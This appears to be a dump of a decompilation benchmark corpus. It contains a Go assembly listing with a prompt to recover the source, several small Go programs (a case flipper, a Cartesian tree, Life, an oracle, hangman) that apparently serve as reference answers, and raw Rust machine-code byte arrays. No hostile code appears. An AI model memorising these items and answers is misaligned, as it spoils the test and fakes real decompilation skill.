99 | CALL runtime.convTstring 100 | MOV RAX,qword ptr [RSP + 0x10] 101 | XORPS 
XMM0,XMM0 102 | MOVUPS xmmword ptr [RSP + 0x68],XMM0 103 | LEA RCX,[0x4a57a0] 104 | MOV qword ptr [RSP + 0x68],RCX 105 | MOV qword ptr [RSP + 0x70],RAX 106 | MOV RAX,qword ptr [os.Stdout] 107 | LEA RCX,[0x4e3840] 108 | MOV qword ptr [RSP],RCX 109 | MOV qword ptr [RSP + 0x8],RAX 110 | LEA RAX,[RSP + 0x68] 111 | MOV qword ptr [RSP + 0x10],RAX 112 | MOV qword ptr [RSP + 0x18],0x1 113 | MOV qword ptr [RSP + 0x20],0x1 114 | CALL fmt.Fprintln 115 | MOV RBP,qword ptr [RSP + 0x88] 116 | ADD RSP,0x90 117 | RET 118 | LAB_00492bb0: 119 | MOV EBX,0xfeedbeef 120 | JMP LAB_00492a73 121 | LAB_00492bba: 122 | CALL runtime.panicIndex 123 | LAB_00492bbf: 124 | CALL runtime.panicdivide 125 | NOP 126 | LAB_00492bc5: 127 | CALL runtime.morestack_noctxt 128 | JMP funcD 129 | //end of function funcD 130 | 131 | Reference Table: 132 | Address Data 133 | 0056c6c0 undefined8 ?? 134 | 00565df8 ?? 0Dh 135 | 004a57a0 ?? 10h 136 | 004a57a0 ?? 10h 137 | 004e2190 addr 004cac41 138 | 004e2190 addr 004cac41 139 | 0056c6d8 undefined8 ?? 140 | 004e3840 undefined1[32] 141 | 004e3840 undefined1[32] 142 | 00565df8 ?? 0Dh 143 | 00569b80 addr 004c92f3 144 | 00565df0 addr 00569b80 145 | 00569b88 ?? 02h 146 | 00569b80 addr 004c92f3 147 | 004a57a0 ?? 10h 148 | 004a57a0 ?? 10h 149 | 0056c6d8 undefined8 ?? 150 | 004e3840 undefined1[32] 151 | 004e3840 undefined1[32] 152 | 153 | Generate just the Go code for the function that produced the above x86 64-bit assembly. The Go code should only represent the funcD function. The Go code is idiomatic and uses standard libraries and channels. 
-------------------------------------------------------------------------------- /eval/go_corpus/source/baby_go_main_2021.go: -------------------------------------------------------------------------------- 1 | package main 2 | 3 | import "os" 4 | import "fmt" 5 | import "bufio" 6 | import "strings" 7 | import "unicode" 8 | 9 | func main() { 10 | reader := bufio.NewReader(os.Stdin) 11 | fmt.Print("Enter string: ") 12 | text, _ := reader.ReadString('\n') 13 | 14 | for _, c := range text { 15 | var s string = string(c) 16 | var x string = "" 17 | if c & 1 == 0 { 18 | if unicode.IsUpper(c){ 19 | x = strings.ToLower(s) 20 | } else { 21 | x = strings.ToUpper(s) 22 | } 23 | } else { 24 | x = s 25 | } 26 | fmt.Print(x) 27 | } 28 | } -------------------------------------------------------------------------------- /eval/go_corpus/source/cartree_main_2021.go: -------------------------------------------------------------------------------- 1 | package main 2 | 3 | import "fmt" 4 | 5 | // https://en.wikipedia.org/wiki/Cartesian_tree 6 | // Builds using the first linear-time method. 
7 | 8 | type Node struct { 9 | P *Node 10 | L *Node 11 | R *Node 12 | D int 13 | } 14 | 15 | func main() { 16 | var root *Node = nil 17 | var curr *Node = nil 18 | var data int 19 | 20 | for { 21 | n, err := fmt.Scan(&data) 22 | if n != 1 || err != nil { 23 | break 24 | } 25 | 26 | for curr != nil && curr.D > data { 27 | curr = curr.P 28 | } 29 | 30 | if curr == nil { 31 | curr = Cons(data, root, nil) 32 | root = curr 33 | } else { 34 | tmp := Cons(data, curr.R, nil) 35 | curr.SetR(tmp) 36 | curr = tmp 37 | } 38 | } 39 | 40 | root.Dump() 41 | fmt.Println() 42 | } -------------------------------------------------------------------------------- /eval/go_corpus/source/goalie_main_2021.go: -------------------------------------------------------------------------------- 1 | package main 2 | 3 | import ( 4 | "flag" 5 | "fmt" 6 | "math/rand" 7 | "os" 8 | "os/signal" 9 | "syscall" 10 | "time" 11 | ) 12 | 13 | var OFFSETS = [][]int { 14 | []int {-1, -1}, 15 | []int {-1, 0}, 16 | []int {-1, +1}, 17 | []int { 0, +1}, 18 | []int {+1, +1}, 19 | []int {+1, 0}, 20 | []int {+1, -1}, 21 | []int { 0, -1}} 22 | 23 | type Field struct { 24 | W uint 25 | H uint 26 | 27 | data [][]bool 28 | temp [][]bool 29 | } 30 | 31 | func main() { 32 | os.Args[0] = "goalie" 33 | f := flag.Duration("f", 314 * time.Millisecond, "frame delay") 34 | w := flag.Uint( "w", 40, "width") 35 | h := flag.Uint( "h", 20, "height") 36 | n := flag.Uint( "n", 0, "frames") 37 | q := flag.Bool( "q", false, "quiet") 38 | s := flag.Int64( "s", 0, "seed") 39 | flag.Parse() 40 | 41 | if *s == 0 { 42 | rand.Seed(time.Now().UnixNano()) 43 | } else { 44 | rand.Seed(*s) 45 | } 46 | 47 | go func() { 48 | sigchan := make(chan os.Signal, 1) 49 | signal.Notify(sigchan, syscall.SIGTERM, syscall.SIGINT) 50 | <-sigchan 51 | *n = 1 52 | }() 53 | 54 | board := NewField(*w, *h) 55 | board.Seed() 56 | 57 | for i := uint(0); *n == 0 || i < *n; i++ { 58 | board.Step() 59 | 60 | if !*q { 61 | if i != 0 { 62 | fmt.Printf("\033[%dF", 
board.H - 1) 63 | } 64 | 65 | board.Draw() 66 | time.Sleep(*f) 67 | } 68 | } 69 | 70 | if *q { 71 | board.Draw() 72 | } 73 | } -------------------------------------------------------------------------------- /eval/go_corpus/source/oracle_predict_2021.go: -------------------------------------------------------------------------------- 1 | package main 2 | 3 | import ( 4 | "fmt" 5 | "os" 6 | "strings" 7 | "bufio" 8 | "math/rand" 9 | ) 10 | 11 | var predictions []string = []string{ 12 | "42", 13 | "Look east!", 14 | "You got the gift, but it looks like you're waiting for something.", 15 | "In one hand you'll have your enemies' life and in the other hand you'll have your own.", 16 | "You just have to make up your own damn mind!", 17 | "Everything that has a beginning has an end.", 18 | "What do all men with power want?", 19 | "Change is inevitable.", 20 | "Know thyself!", 21 | "Love of money and nothing else will ruin you.", 22 | "Care for these things fall on me!", 23 | "Make your own nature, not the advice of others, your guide in life.", 24 | "The number 73 marks the hour of your downfall!"} 25 | 26 | func predict(data []string) { 27 | var index int = 0xFEEDBEEF 28 | for _, s := range data { 29 | for _, c := range s { 30 | index += int(c) 31 | } 32 | } 33 | rand.Seed(int64(index)) 34 | index += rand.Int() 35 | index = index % len(predictions) 36 | fmt.Println("Your prediction:") 37 | fmt.Println(predictions[index]) 38 | } 39 | -------------------------------------------------------------------------------- /eval/go_corpus/source/scaffold_main_2021.go: -------------------------------------------------------------------------------- 1 | package main 2 | 3 | import ( 4 | "bufio" 5 | "flag" 6 | "fmt" 7 | "log" 8 | "math/rand" 9 | "os" 10 | "strings" 11 | "time" 12 | ) 13 | 14 | var BODYPARTS = []string { 15 | "liver", 16 | "right kidney", 17 | "spleen", 18 | "pancreas", 19 | "rumen", 20 | "esophagus", 21 | "head", 22 | } 23 | 24 | func main() { 25 | os.Args[0] = 
"scaffold" 26 | path := flag.String("w", "/usr/share/dict/words", "words file") 27 | seed := flag.Int64( "s", time.Now().UnixNano(), "random seed") 28 | flag.Parse() 29 | 30 | rand.Seed(*seed) 31 | read := bufio.NewReader(os.Stdin) 32 | word := []byte(selec(*path)) 33 | ltrs := len(word) 34 | know := []byte(strings.Repeat("_", ltrs)) 35 | pick := make(map[byte]bool) 36 | fail := 0 37 | 38 | for true { 39 | fmt.Print("(" + string(know) + "): ") 40 | s, err := read.ReadString('\n') 41 | if err != nil {break} 42 | 43 | if len(s) < 2 { 44 | continue 45 | } 46 | 47 | c := s[0] 48 | if pick[c] { 49 | fmt.Println("You already tried that.") 50 | continue 51 | } 52 | 53 | count := 0 54 | pick[c] = true 55 | for i := 0; i < len(word); i++ { 56 | if word[i] == c { 57 | know[i] = c 58 | count++ 59 | } 60 | } 61 | 62 | if count == 0 { 63 | fmt.Println("You lost your " + BODYPARTS[fail] + "!") 64 | fail++ 65 | if fail == len(BODYPARTS) { 66 | fmt.Println("It was fatal.") 67 | return 68 | } 69 | } else { 70 | ltrs -= count 71 | if ltrs == 0 { 72 | fmt.Println("Yay.") 73 | return 74 | } 75 | } 76 | } 77 | } -------------------------------------------------------------------------------- /eval/rust_corpus/disasm/baby_rust_step_2021.txt: -------------------------------------------------------------------------------- 1 | [72, 129, 236, 152, 1, 0, 0, 72, 137, 116, 36, 72, 72, 137, 248, 72, 139, 124, 36, 72, 72, 137, 68, 36, 80, 72, 137, 68, 36, 88, 198, 132, 36, 135, 1, 0, 0, 0, 232, 37, 27, 0, 0, 72, 137, 84, 36, 96, 72, 137, 68, 36, 104, 235, 37, 72, 139, 116, 36, 96, 72, 139, 124, 36, 104, 232, 117, 29, 0, 0, 72, 137, 84, 36, 56, 72, 137, 68, 36, 64, 235, 0, 72, 139, 84, 36, 56, 72, 139, 116, 36, 64, 72, 141, 124, 36, 112, 232, 133, 29, 0, 0, 235, 0, 198, 132, 36, 135, 1, 0, 0, 1, 72, 141, 124, 36, 112, 232, 225, 236, 255, 255, 137, 68, 36, 52, 235, 38, 139, 68, 36, 52, 137, 132, 36, 136, 0, 0, 0, 184, 1, 0, 0, 0, 49, 201, 129, 188, 36, 136, 0, 0, 0, 0, 0, 17, 0, 72, 15, 68, 193, 
72, 131, 248, 0, 117, 26, 72, 139, 124, 36, 80, 72, 141, 53, 243, 151, 3, 0, 49, 192, 137, 194, 232, 57, 30, 0, 0, 233, 15, 2, 0, 0, 139, 132, 36, 136, 0, 0, 0, 137, 132, 36, 140, 0, 0, 0, 72, 141, 188, 36, 140, 0, 0, 0, 232, 217, 244, 255, 255, 72, 137, 84, 36, 32, 72, 137, 68, 36, 40, 235, 0, 72, 139, 68, 36, 32, 72, 139, 76, 36, 40, 72, 137, 76, 36, 16, 72, 137, 68, 36, 24, 198, 132, 36, 135, 1, 0, 0, 0, 72, 139, 132, 36, 128, 0, 0, 0, 72, 137, 132, 36, 112, 1, 0, 0, 15, 16, 68, 36, 112, 15, 41, 132, 36, 96, 1, 0, 0, 72, 141, 188, 36, 64, 1, 0, 0, 72, 141, 180, 36, 96, 1, 0, 0, 232, 239, 237, 255, 255, 235, 0, 72, 141, 188, 36, 40, 1, 0, 0, 72, 141, 180, 36, 64, 1, 0, 0, 232, 152, 16, 0, 0, 235, 0, 72, 141, 188, 36, 16, 1, 0, 0, 72, 141, 180, 36, 40, 1, 0, 0, 232, 81, 254, 255, 255, 235, 0, 72, 141, 188, 36, 16, 1, 0, 0, 232, 34, 244, 255, 255, 72, 137, 20, 36, 72, 137, 68, 36, 8, 235, 40, 72, 139, 4, 36, 72, 139, 76, 36, 8, 72, 139, 84, 36, 24, 72, 139, 116, 36, 16, 72, 137, 180, 36, 240, 0, 0, 0, 72, 137, 148, 36, 248, 0, 0, 0, 72, 137, 140, 36, 0, 1, 0, 0, 72, 137, 132, 36, 8, 1, 0, 0, 72, 141, 53, 253, 180, 4, 0, 72, 141, 188, 36, 192, 0, 0, 0, 72, 141, 140, 36, 240, 0, 0, 0, 65, 184, 2, 0, 0, 0, 76, 137, 194, 232, 103, 244, 255, 255, 235, 0, 72, 141, 188, 36, 168, 0, 0, 0, 72, 141, 180, 36, 192, 0, 0, 0, 232, 80, 28, 0, 0, 235, 0, 72, 141, 188, 36, 16, 1, 0, 0, 232, 129, 239, 255, 255, 235, 51, 72, 139, 124, 36, 80, 72, 139, 132, 36, 184, 0, 0, 0, 72, 137, 132, 36, 160, 0, 0, 0, 15, 16, 132, 36, 168, 0, 0, 0, 15, 41, 132, 36, 144, 0, 0, 0, 72, 141, 180, 36, 144, 0, 0, 0, 232, 90, 24, 0, 0, 235, 40, 72, 141, 188, 36, 144, 0, 0, 0, 232, 227, 238, 255, 255, 235, 0, 246, 132, 36, 135, 1, 0, 0, 1, 117, 50, 235, 17, 235, 242, 72, 139, 124, 36, 72, 198, 132, 36, 135, 1, 0, 0, 0, 232, 178, 238, 255, 255, 72, 139, 68, 36, 88, 72, 129, 196, 152, 1, 0, 0, 195, 72, 141, 124, 36, 112, 232, 27, 239, 255, 255, 235, 213] 
-------------------------------------------------------------------------------- /eval/rust_corpus/disasm/braintrust_new_2021.txt: -------------------------------------------------------------------------------- 1 | [72, 129, 236, 136, 1, 0, 0, 72, 137, 84, 36, 80, 72, 137, 116, 36, 88, 72, 137, 124, 36, 96, 72, 137, 124, 36, 104, 198, 132, 36, 119, 1, 0, 0, 0, 72, 141, 124, 36, 112, 232, 51, 8, 0, 0, 72, 141, 188, 36, 136, 0, 0, 0, 232, 38, 80, 0, 0, 235, 37, 72, 139, 116, 36, 80, 72, 139, 124, 36, 88, 198, 132, 36, 119, 1, 0, 0, 1, 232, 104, 77, 0, 0, 72, 137, 84, 36, 64, 72, 137, 68, 36, 72, 235, 38, 72, 139, 84, 36, 64, 72, 139, 116, 36, 72, 72, 141, 188, 36, 208, 0, 0, 0, 232, 31, 66, 0, 0, 235, 0, 72, 141, 188, 36, 184, 0, 0, 0, 72, 141, 180, 36, 208, 0, 0, 0, 232, 24, 94, 0, 0, 235, 0, 72, 139, 132, 36, 184, 0, 0, 0, 72, 137, 132, 36, 232, 0, 0, 0, 72, 139, 132, 36, 192, 0, 0, 0, 72, 137, 132, 36, 240, 0, 0, 0, 72, 139, 132, 36, 200, 0, 0, 0, 72, 137, 132, 36, 248, 0, 0, 0, 72, 141, 188, 36, 232, 0, 0, 0, 232, 41, 88, 0, 0, 72, 137, 84, 36, 48, 72, 137, 68, 36, 56, 235, 0, 72, 139, 68, 36, 48, 72, 139, 76, 36, 56, 72, 137, 140, 36, 0, 1, 0, 0, 72, 137, 132, 36, 8, 1, 0, 0, 72, 139, 148, 36, 8, 1, 0, 0, 184, 1, 0, 0, 0, 49, 201, 72, 131, 250, 0, 72, 15, 68, 193, 72, 131, 248, 0, 117, 20, 72, 141, 124, 36, 112, 232, 92, 7, 0, 0, 72, 137, 68, 36, 40, 233, 168, 0, 0, 0, 72, 139, 132, 36, 0, 1, 0, 0, 72, 137, 68, 36, 24, 72, 139, 132, 36, 8, 1, 0, 0, 72, 137, 68, 36, 32, 128, 56, 91, 117, 17, 72, 139, 116, 36, 24, 72, 141, 124, 36, 112, 232, 164, 8, 0, 0, 235, 15, 72, 139, 68, 36, 32, 128, 56, 93, 116, 7, 233, 93, 255, 255, 255, 235, 239, 72, 141, 124, 36, 112, 232, 103, 7, 0, 0, 72, 137, 84, 36, 8, 72, 137, 68, 36, 16, 235, 0, 72, 139, 116, 36, 8, 72, 139, 124, 36, 16, 72, 141, 21, 26, 28, 5, 0, 232, 229, 248, 255, 255, 72, 137, 4, 36, 235, 0, 72, 139, 20, 36, 72, 139, 116, 36, 24, 72, 141, 188, 36, 136, 0, 0, 0, 232, 185, 78, 0, 0, 235, 0, 72, 139, 84, 36, 24, 
72, 139, 52, 36, 72, 141, 188, 36, 136, 0, 0, 0, 232, 161, 78, 0, 0, 235, 0, 233, 244, 254, 255, 255, 72, 139, 68, 36, 40, 72, 131, 248, 0, 15, 148, 192, 52, 255, 168, 1, 117, 71, 198, 132, 36, 119, 1, 0, 0, 0, 15, 16, 132, 36, 136, 0, 0, 0, 15, 16, 140, 36, 152, 0, 0, 0, 15, 16, 148, 36, 168, 0, 0, 0, 15, 41, 148, 36, 48, 1, 0, 0, 15, 41, 140, 36, 32, 1, 0, 0, 15, 41, 132, 36, 16, 1, 0, 0, 72, 141, 188, 36, 64, 1, 0, 0, 232, 35, 6, 0, 0, 235, 72, 72, 141, 61, 143, 225, 3, 0, 72, 141, 21, 139, 27, 5, 0, 72, 141, 5, 236, 185, 255, 255, 190, 30, 0, 0, 0, 255, 208, 235, 0, 15, 11, 72, 141, 188, 36, 88, 1, 0, 0, 232, 204, 5, 0, 0, 235, 37, 72, 139, 124, 36, 96, 72, 141, 180, 36, 16, 1, 0, 0, 186, 48, 0, 0, 0, 232, 222, 142, 255, 255, 72, 139, 68, 36, 96, 72, 139, 140, 36, 64, 1, 0, 0, 72, 137, 72, 48, 72, 139, 140, 36, 72, 1, 0, 0, 72, 137, 72, 56, 72, 139, 140, 36, 80, 1, 0, 0, 72, 137, 72, 64, 72, 139, 140, 36, 88, 1, 0, 0, 72, 137, 72, 72, 72, 139, 140, 36, 96, 1, 0, 0, 72, 137, 72, 80, 72, 139, 140, 36, 104, 1, 0, 0, 72, 137, 72, 88, 198, 64, 96, 0, 198, 132, 36, 119, 1, 0, 0, 0, 72, 141, 124, 36, 112, 232, 59, 26, 0, 0, 72, 139, 68, 36, 104, 72, 129, 196, 136, 1, 0, 0, 195] -------------------------------------------------------------------------------- /eval/rust_corpus/disasm/endeavour_enco_2021.txt: -------------------------------------------------------------------------------- 1 | [72, 129, 236, 136, 1, 0, 0, 72, 137, 140, 36, 216, 0, 0, 0, 72, 137, 148, 36, 208, 0, 0, 0, 72, 137, 180, 36, 184, 0, 0, 0, 72, 137, 188, 36, 192, 0, 0, 0, 72, 137, 248, 72, 137, 132, 36, 200, 0, 0, 0, 232, 217, 248, 255, 255, 72, 139, 180, 36, 208, 0, 0, 0, 72, 139, 148, 36, 216, 0, 0, 0, 198, 132, 36, 231, 0, 0, 0, 0, 72, 141, 188, 36, 232, 0, 0, 0, 232, 36, 215, 255, 255, 235, 40, 72, 141, 188, 36, 232, 0, 0, 0, 232, 13, 251, 255, 255, 72, 137, 148, 36, 168, 0, 0, 0, 72, 137, 132, 36, 176, 0, 0, 0, 235, 37, 72, 139, 180, 36, 168, 0, 0, 0, 72, 139, 188, 36, 176, 0, 0, 0, 232, 
113, 217, 255, 255, 72, 137, 148, 36, 152, 0, 0, 0, 72, 137, 132, 36, 160, 0, 0, 0, 235, 0, 72, 139, 180, 36, 152, 0, 0, 0, 72, 139, 188, 36, 160, 0, 0, 0, 232, 26, 215, 255, 255, 72, 137, 148, 36, 136, 0, 0, 0, 72, 137, 132, 36, 144, 0, 0, 0, 235, 0, 72, 139, 132, 36, 136, 0, 0, 0, 72, 139, 140, 36, 144, 0, 0, 0, 72, 137, 140, 36, 0, 1, 0, 0, 72, 137, 132, 36, 8, 1, 0, 0, 72, 141, 188, 36, 0, 1, 0, 0, 232, 235, 214, 255, 255, 137, 132, 36, 132, 0, 0, 0, 235, 0, 139, 132, 36, 132, 0, 0, 0, 137, 132, 36, 16, 1, 0, 0, 184, 1, 0, 0, 0, 49, 201, 129, 188, 36, 16, 1, 0, 0, 0, 0, 17, 0, 72, 15, 68, 193, 72, 131, 248, 0, 117, 18, 72, 141, 188, 36, 232, 0, 0, 0, 232, 171, 17, 0, 0, 233, 56, 3, 0, 0, 139, 132, 36, 16, 1, 0, 0, 137, 132, 36, 20, 1, 0, 0, 131, 188, 36, 20, 1, 0, 0, 32, 117, 23, 72, 139, 188, 36, 192, 0, 0, 0, 190, 47, 0, 0, 0, 232, 236, 248, 255, 255, 233, 252, 2, 0, 0, 246, 132, 36, 231, 0, 0, 0, 1, 117, 12, 131, 188, 36, 20, 1, 0, 0, 63, 116, 32, 235, 53, 72, 139, 188, 36, 192, 0, 0, 0, 190, 32, 0, 0, 0, 232, 191, 248, 255, 255, 235, 0, 198, 132, 36, 231, 0, 0, 0, 0, 235, 214, 72, 139, 188, 36, 192, 0, 0, 0, 190, 63, 0, 0, 0, 232, 161, 248, 255, 255, 233, 172, 2, 0, 0, 72, 139, 188, 36, 184, 0, 0, 0, 232, 239, 231, 255, 255, 72, 137, 84, 36, 112, 72, 137, 68, 36, 120, 235, 0, 72, 139, 116, 36, 112, 72, 139, 124, 36, 120, 232, 228, 205, 255, 255, 72, 137, 84, 36, 96, 72, 137, 68, 36, 104, 235, 0, 72, 139, 68, 36, 96, 72, 139, 76, 36, 104, 72, 137, 140, 36, 40, 1, 0, 0, 72, 137, 132, 36, 48, 1, 0, 0, 72, 141, 132, 36, 20, 1, 0, 0, 72, 137, 132, 36, 56, 1, 0, 0, 72, 139, 180, 36, 56, 1, 0, 0, 72, 141, 188, 36, 40, 1, 0, 0, 232, 41, 200, 255, 255, 72, 137, 84, 36, 80, 72, 137, 68, 36, 88, 235, 0, 72, 139, 68, 36, 80, 72, 139, 76, 36, 88, 72, 137, 140, 36, 24, 1, 0, 0, 72, 137, 132, 36, 32, 1, 0, 0, 72, 131, 188, 36, 24, 1, 0, 0, 0, 117, 23, 72, 139, 188, 36, 192, 0, 0, 0, 190, 63, 0, 0, 0, 232, 230, 247, 255, 255, 233, 236, 1, 0, 0, 72, 139, 132, 36, 32, 1, 0, 
0, 72, 137, 132, 36, 64, 1, 0, 0, 72, 141, 188, 36, 72, 1, 0, 0, 232, 36, 224, 255, 255, 235, 0, 198, 132, 36, 231, 0, 0, 0, 1, 72, 131, 188, 36, 64, 1, 0, 0, 0, 119, 28, 72, 141, 188, 36, 72, 1, 0, 0, 232, 2, 231, 255, 255, 72, 137, 84, 36, 64, 72, 137, 68, 36, 72, 233, 191, 0, 0, 0, 72, 139, 132, 36, 64, 1, 0, 0, 72, 131, 224, 1, 72, 131, 248, 1, 117, 20, 72, 141, 188, 36, 72, 1, 0, 0, 190, 46, 0, 0, 0, 232, 175, 228, 255, 255, 235, 95, 72, 141, 188, 36, 72, 1, 0, 0, 190, 45, 0, 0, 0, 232, 155, 228, 255, 255, 235, 40, 235, 0, 72, 139, 132, 36, 64, 1, 0, 0, 72, 137, 193, 72, 131, 233, 1, 72, 137, 76, 36, 56, 72, 131, 248, 1, 15, 146, 192, 168, 1, 117, 6, 235, 2, 235, 221, 235, 32, 72, 141, 61, 99, 152, 3, 0, 72, 141, 21, 228, 194, 4, 0, 72, 141, 5, 213, 158, 255, 255, 190, 33, 0, 0, 0, 255, 208, 235, 0, 15, 11, 72, 139, 68, 36, 56, 72, 193, 232, 1, 72, 137, 132, 36, 64, 1, 0, 0, 233, 26, 255, 255, 255, 72, 139, 116, 36, 64, 72, 139, 124, 36, 72, 232, 53, 204, 255, 255, 72, 137, 84, 36, 40, 72, 137, 68, 36, 48, 235, 0, 72, 139, 116, 36, 40, 72, 139, 124, 36, 48, 232, 138, 194, 255, 255, 72, 137, 84, 36, 24, 72, 137, 68, 36, 32, 235, 0, 72, 139, 116, 36, 24, 72, 139, 124, 36, 32, 232, 159, 20, 0, 0, 72, 137, 84, 36, 8, 72, 137, 68, 36, 16, 235, 0, 72, 139, 68, 36, 8, 72, 139, 76, 36, 16, 72, 137, 140, 36, 96, 1, 0, 0, 72, 137, 132, 36, 104, 1, 0, 0, 72, 141, 188, 36, 96, 1, 0, 0, 232, 124, 20, 0, 0, 72, 137, 4, 36, 235, 0, 72, 139, 4, 36, 72, 137, 132, 36, 112, 1, 0, 0, 72, 139, 148, 36, 112, 1, 0, 0, 184, 1, 0, 0, 0, 49, 201, 72, 131, 250, 0, 72, 15, 68, 193, 72, 131, 248, 0, 117, 18, 72, 141, 188, 36, 72, 1, 0, 0, 232, 80, 15, 0, 0, 233, 179, 252, 255, 255, 72, 139, 188, 36, 192, 0, 0, 0, 72, 139, 132, 36, 112, 1, 0, 0, 139, 48, 232, 4, 246, 255, 255, 235, 0, 235, 151, 233, 136, 252, 255, 255, 233, 131, 252, 255, 255, 198, 132, 36, 231, 0, 0, 0, 0, 233, 118, 252, 255, 255, 72, 139, 132, 36, 200, 0, 0, 0, 72, 129, 196, 136, 1, 0, 0, 195] 
-------------------------------------------------------------------------------- /eval/rust_corpus/disasm/parasite_deco_2021.txt: -------------------------------------------------------------------------------- 1 | [72, 129, 236, 248, 6, 0, 0, 72, 137, 148, 36, 248, 0, 0, 0, 72, 137, 180, 36, 0, 1, 0, 0, 72, 137, 188, 36, 8, 1, 0, 0, 72, 137, 188, 36, 16, 1, 0, 0, 198, 132, 36, 231, 6, 0, 0, 0, 72, 141, 53, 209, 9, 4, 0, 72, 141, 13, 244, 9, 4, 0, 72, 137, 140, 36, 48, 1, 0, 0, 72, 141, 188, 36, 128, 2, 0, 0, 72, 137, 188, 36, 24, 1, 0, 0, 186, 42, 0, 0, 0, 65, 184, 1, 0, 0, 0, 76, 137, 132, 36, 56, 1, 0, 0, 232, 243, 224, 255, 255, 72, 139, 180, 36, 24, 1, 0, 0, 72, 141, 188, 36, 248, 1, 0, 0, 72, 137, 188, 36, 32, 1, 0, 0, 232, 134, 122, 0, 0, 72, 139, 180, 36, 32, 1, 0, 0, 72, 141, 188, 36, 112, 1, 0, 0, 72, 137, 188, 36, 40, 1, 0, 0, 232, 217, 35, 0, 0, 72, 139, 180, 36, 40, 1, 0, 0, 72, 141, 188, 36, 64, 1, 0, 0, 232, 52, 102, 0, 0, 72, 139, 140, 36, 48, 1, 0, 0, 76, 139, 132, 36, 56, 1, 0, 0, 72, 141, 53, 95, 9, 4, 0, 72, 141, 188, 36, 64, 4, 0, 0, 186, 54, 0, 0, 0, 232, 123, 224, 255, 255, 235, 40, 72, 141, 188, 36, 184, 3, 0, 0, 72, 141, 180, 36, 64, 4, 0, 0, 232, 236, 121, 0, 0, 235, 0, 72, 141, 188, 36, 48, 3, 0, 0, 72, 141, 180, 36, 184, 3, 0, 0, 232, 5, 35, 0, 0, 235, 0, 72, 141, 188, 36, 0, 3, 0, 0, 72, 141, 180, 36, 48, 3, 0, 0, 232, 190, 101, 0, 0, 235, 0, 72, 141, 53, 13, 9, 4, 0, 72, 141, 13, 207, 8, 4, 0, 72, 141, 188, 36, 0, 6, 0, 0, 186, 67, 0, 0, 0, 65, 184, 1, 0, 0, 0, 232, 230, 223, 255, 255, 235, 40, 72, 141, 188, 36, 120, 5, 0, 0, 72, 141, 180, 36, 0, 6, 0, 0, 232, 87, 121, 0, 0, 235, 0, 72, 141, 188, 36, 240, 4, 0, 0, 72, 141, 180, 36, 120, 5, 0, 0, 232, 144, 34, 0, 0, 235, 0, 72, 141, 188, 36, 192, 4, 0, 0, 72, 141, 180, 36, 240, 4, 0, 0, 232, 73, 101, 0, 0, 235, 0, 72, 139, 188, 36, 8, 1, 0, 0, 232, 202, 19, 0, 0, 235, 40, 72, 139, 148, 36, 248, 0, 0, 0, 72, 139, 180, 36, 0, 1, 0, 0, 198, 132, 36, 231, 6, 0, 0, 1, 72, 141, 188, 36, 128, 
6, 0, 0, 232, 219, 18, 0, 0, 235, 38, 72, 141, 188, 36, 128, 6, 0, 0, 232, 86, 21, 0, 0, 72, 137, 148, 36, 232, 0, 0, 0, 72, 137, 132, 36, 240, 0, 0, 0, 235, 37, 72, 139, 180, 36, 232, 0, 0, 0, 72, 139, 188, 36, 240, 0, 0, 0, 232, 106, 222, 255, 255, 72, 137, 148, 36, 216, 0, 0, 0, 72, 137, 132, 36, 224, 0, 0, 0, 235, 0, 72, 139, 148, 36, 216, 0, 0, 0, 72, 139, 180, 36, 224, 0, 0, 0, 72, 141, 188, 36, 152, 6, 0, 0, 232, 251, 119, 0, 0, 235, 0, 235, 0, 72, 141, 188, 36, 152, 6, 0, 0, 232, 170, 223, 255, 255, 72, 137, 132, 36, 208, 0, 0, 0, 235, 0, 72, 139, 132, 36, 208, 0, 0, 0, 72, 137, 132, 36, 176, 6, 0, 0, 72, 141, 188, 36, 176, 6, 0, 0, 232, 67, 51, 0, 0, 136, 132, 36, 207, 0, 0, 0, 235, 0, 138, 132, 36, 207, 0, 0, 0, 168, 1, 117, 28, 235, 0, 198, 132, 36, 231, 6, 0, 0, 0, 72, 141, 188, 36, 128, 6, 0, 0, 232, 248, 12, 0, 0, 233, 116, 3, 0, 0, 72, 141, 188, 36, 152, 6, 0, 0, 232, 22, 223, 255, 255, 72, 137, 132, 36, 192, 0, 0, 0, 235, 0, 72, 139, 180, 36, 192, 0, 0, 0, 72, 141, 188, 36, 64, 1, 0, 0, 232, 231, 250, 255, 255, 72, 137, 148, 36, 176, 0, 0, 0, 72, 137, 132, 36, 184, 0, 0, 0, 235, 0, 72, 139, 132, 36, 176, 0, 0, 0, 72, 139, 140, 36, 184, 0, 0, 0, 72, 137, 140, 36, 152, 0, 0, 0, 72, 137, 132, 36, 160, 0, 0, 0, 72, 141, 188, 36, 152, 6, 0, 0, 232, 184, 222, 255, 255, 72, 137, 132, 36, 168, 0, 0, 0, 235, 0, 72, 139, 180, 36, 168, 0, 0, 0, 72, 141, 188, 36, 0, 3, 0, 0, 232, 137, 250, 255, 255, 72, 137, 148, 36, 136, 0, 0, 0, 72, 137, 132, 36, 144, 0, 0, 0, 235, 0, 72, 139, 132, 36, 136, 0, 0, 0, 72, 139, 140, 36, 144, 0, 0, 0, 72, 137, 76, 36, 112, 72, 137, 68, 36, 120, 72, 141, 188, 36, 152, 6, 0, 0, 232, 96, 222, 255, 255, 72, 137, 132, 36, 128, 0, 0, 0, 235, 0, 72, 139, 180, 36, 128, 0, 0, 0, 72, 141, 188, 36, 192, 4, 0, 0, 232, 49, 250, 255, 255, 72, 137, 84, 36, 96, 72, 137, 68, 36, 104, 235, 0, 72, 139, 68, 36, 120, 72, 139, 76, 36, 112, 72, 139, 148, 36, 160, 0, 0, 0, 72, 139, 180, 36, 152, 0, 0, 0, 72, 137, 180, 36, 184, 6, 0, 0, 72, 137, 148, 36, 
